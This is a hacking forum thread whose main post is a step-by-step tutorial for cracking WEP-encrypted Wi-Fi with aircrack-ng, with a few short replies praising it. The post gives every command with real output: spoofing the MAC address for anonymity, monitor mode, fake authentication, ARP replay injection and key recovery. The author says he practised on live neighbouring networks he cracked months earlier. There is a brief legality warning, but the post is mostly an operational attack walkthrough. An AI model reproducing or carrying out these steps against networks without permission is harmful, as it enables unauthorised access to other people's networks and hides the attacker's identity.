Howdy, Stranger!

It looks like you're new here. If you want to get involved, click one of these buttons!

Top Posters

Who's Online (2)

Powered by Vanilla. Made with Bootstrap.
Wireless Network Penetration: WEP Encryption
  • Sh3llc0d3
    Posts: 1,910
    [align=center]Wireless Network Penetration: WEP Encryption
    Written by me, and as always all rights belong to me. Don't copy unless permission is given.[/align]

    Why do it this tut?
    Well I know this is a new forum and some newer members to hacking may want a tutorial to guide them through the process. Not only that but experienced members can use this as reference. I wrote this a while ago but I like it because as you will see i've put the outputs I got onscreen while completing the tasks.

    What will we be doing?
    Basic WEP encryption crack to gain access to a network, nothing special just the basic execution of the aircrack-ng suite.

    What will you need?
    Ubuntu/Mint/Backtrack/etc... [Any Linux distro basically, you can also use these tools in Windows but I will be concentrating only with Linux methods at the moment.]
    Aircrack-ng suite.
    Compatible wireless interface that supports packet injection, I personally prefer the ALFA 1000mW USB interface. If you're wanting to find out what hardware is compatible google search backtrack HCL [hardware compatibility list].

    A word of warning, what we will be doing, well what I'll be doing and you following is illegal if you breach a network/system you do not own or have permission to access. So setup a fake AP [Access Point] and practice or get permission.

    Right guys, lets crack on [haha], I will be using Linux Mint 8 'Helena' for this demo, as this type of tutorial has been replicated so so many times on Back|Track and I thought I'd do it on a more widely used non-pentesting distro. These commands and tutorials can be replicated on many different distro's.

    If you haven't got Back|Track then you'll need some basic tools to turn your distro into a Wireless cracking machine (well for WEP anyway).
    To download/install Aircrack-ng suite:
    sudo apt-get install aircrack-ng

    To download/install macchanger:
    sudo apt-get install macchanger


    **Now I am assuming that you have your wireless interface connected already. I will be using live networks and blocking out the addresses [XX:XX:XX:XX:XX:XX is the address i will be cracking.]**

    Make sure you aren't connected to the internet on the wireless interface your going to be using to crack and use the following to view interfaces picked up by Aircrack suite.

    First switch to root:
    sudo su


    I'll be copying as I go so the commands are after the '#' symbol. This isn't 'cos it's easier for me but so you can see the outputs I get and compare them to your own if you go wrong.
    Hacktop semtex-primed # airmon-ng

    Interface Chipset Driver
    wlan0 RTL8187 rtl8187 - [phy1]
    wlan1 Unknown ndiswrapper

    From this we can see Wlan0 is my ALFA usb interface and Wlan1 Is my built in Broadcom wireless. The broadcom cannot be used for cracking so we forget this and only need Wlan0. First we need to change the MAC address for anonymity.

    To stop the interface:
    Hacktop semtex-primed # airmon-ng stop wlan0
    Interface Chipset Driver
    wlan0 RTL8187 rtl8187 - [phy1]
    (monitor mode disabled)
    wlan1 Unknown ndiswrapper


    To change the MAC [You can replace 00:11:22:33:44:55 with any MAC address you wish to spoof]:
    Hacktop semtex-primed # macchanger --mac 00:11:22:33:44:55 wlan0
    Current MAC: XX:XX:XX:XX:XX:XX (Alfa, Inc.)
    Faked MAC: 00:11:22:33:44:55 (Cimsys Inc)


    To re-enable the interface and put it in monitor mode:
    Hacktop semtex-primed # airmon-ng start wlan0
    Found 5 processes that could cause trouble.

    If airodump-ng, aireplay-ng or airtun-ng stops working after
    a short period of time, you may want to kill (some of) them!

    PID Name
    841 avahi-daemon
    842 avahi-daemon
    1207 NetworkManager
    1436 wpa_supplicant
    4507 dhclient
    Process with PID 4507 (dhclient) is running on interface wlan1

    Interface Chipset Driver
    wlan0 RTL8187 rtl8187 - [phy1]
    (monitor mode enabled on mon0)
    wlan1 Unknown ndiswrapper

    Don't worry about the errors/warnings, you will also notice it has created a interface called 'mon0' which is Wlan0 in monitor mode.

    Now we have set everything up we can scan for near-by Access Points [AP's].
    Hacktop semtex-primed # airodump-ng mon0

    The output, which are the networks that our interface can pick up, generally the higher up the list the better the connection will be.
    CH  3 ][ Elapsed: 4 s ][ 2010-04-05 04:24                                     

    BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

    XX:XX:XX:XX:XX:XX -55 11 0 0 7 54e WEP WEP BTHom
    XX:XX:XX:XX:XX:XX -72 5 0 0 11 54 . WPA TKIP PSK NETGE
    XX:XX:XX:XX:XX:XX -72 6 0 0 1 54e. WPA2 CCMP PSK guest
    XX:XX:XX:XX:XX:XX -73 6 0 0 1 54e. WPA2 CCMP PSK River
    XX:XX:XX:XX:XX:XX -75 2 0 0 11 54e OPN BTOpe
    XX:XX:XX:XX:XX:XX -76 2 0 0 11 54e WEP WEP BTHom

    BSSID STATION PWR Rate Lost Packets Probes


    Then stop the search when you have a AP that has WEP encrpytion using "Ctrl+C". Here i have two, both which I have cracked months ago and have the passwords already. But for these purposes i'll be using them. For reference they're the first and last ones.

    So we need to isolate and monitor ONE of these using the below commands [-c is the channel of the AP, -w states the filename you wish to write to, and --bssid is the address of the AP you wish to crack]:
    Hacktop semtex-primed # airodump-ng -c 7 -w wep --bssid XX:XX:XX:XX:XX:XX wlan0

    And the output:
    [CH  7 ][ Elapsed: 8 s ][ 2010-04-05 04:39                                         

    BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
    XX:XX:XX:XX:XX: -54 100 106 11 0 7 54e WEP WEP BTHomeHub-0F6B

    BSSID STATION PWR Rate Lost Packets


    What we're interested in is the #Data column, when we start monitoring packets we need this to get to at least 5k [5000]. It can take more but a general rule is don't try the lst step until it hits 5k's worth of IV's.

    So our next move is to associate our interface with the AP as at the moment all we have is a AP we're monitoring. In a new terminal window follow these commands, don't close the current terminal session though!!!
    Hacktop semtex-primed # aireplay-ng -1 0 -a XX:XX:XX:XX:XX:XX -h 00:11:22:33:44:55 mon0

    The output:
    The interface MAC (--:--:--:--:--:--) doesn't match the specified MAC (-h).
    ifconfig mon0 hw ether 00:11:22:33:44:55
    05:00:16 Waiting for beacon frame (BSSID: XX:XX:XX:XX:XX:XX) on channel 7

    05:00:16 Sending Authentication Request (Open System) [ACK]
    05:00:16 Authentication successful
    05:00:16 Sending Association Request [ACK]
    05:00:16 Association successful :-) (AID: 1)

    Now we are associated... as shown if you go back to your first terminal window, you will see your interface associated at the bottom, with the AP.

    Next up is us getting the packets [ARP & ACKs], we do this in the same terminal using:
    Hacktop semtex-primed # aireplay-ng -3 -b XX:XX:XX:XX:XX:XX -h 00:11:22:33:44:55 mon0

    The output of this will be a the interface collecting the packets. Don't cancel it whatever happens!!! This is important, if you get a De-auth [de-authorised packet] then use Ctrl+C to stop the collection of packets and use the association commands again and try this again when thats completed.

    So we get the minimum required amount of IV's [5000] then we open a 3rd terminal window and type:
    Hacktop semtex-primed # aircrack-ng -b XX:XX:XX:XX:XX:XX wep-01.cap

    Where -b is the address of the AP, and wep replaced by the filename of your initial file you chose. This will present you with the aircrack attempting to find the key. This will stop if it can't find it and wait for more IV's. Once it has enough data it will present you with the code in a AD:12:AS:AS:AF:GE type format, remove the ':' and you have the password!

    Thankyou and a goodnight xD
  • chroniccommand
    Posts: 1,389
    Easy. But nice information.
  • rx-
    Posts: 169
    nice guide for beginners
  • Sh3llc0d3
    Posts: 1,910
    @chroniccommand - Yeah defo lol
    @rx- - Agreed like CC pointed out it's a bit noobish but everyone has to start somewhere, dreaming up my next advanced tutorial at the moment. Getting knuckled down with some learning after that, been writing tut's and helping people bit too much recently with skid stuff. Glad to see people a lot more clued about stuff here though.
  • Xin
    Posts: 3,251
    Great Paper, still essential to everyone even if it is for beginners
    Xin
  • Bursihido
    Posts: 406
    Excellent job bro :)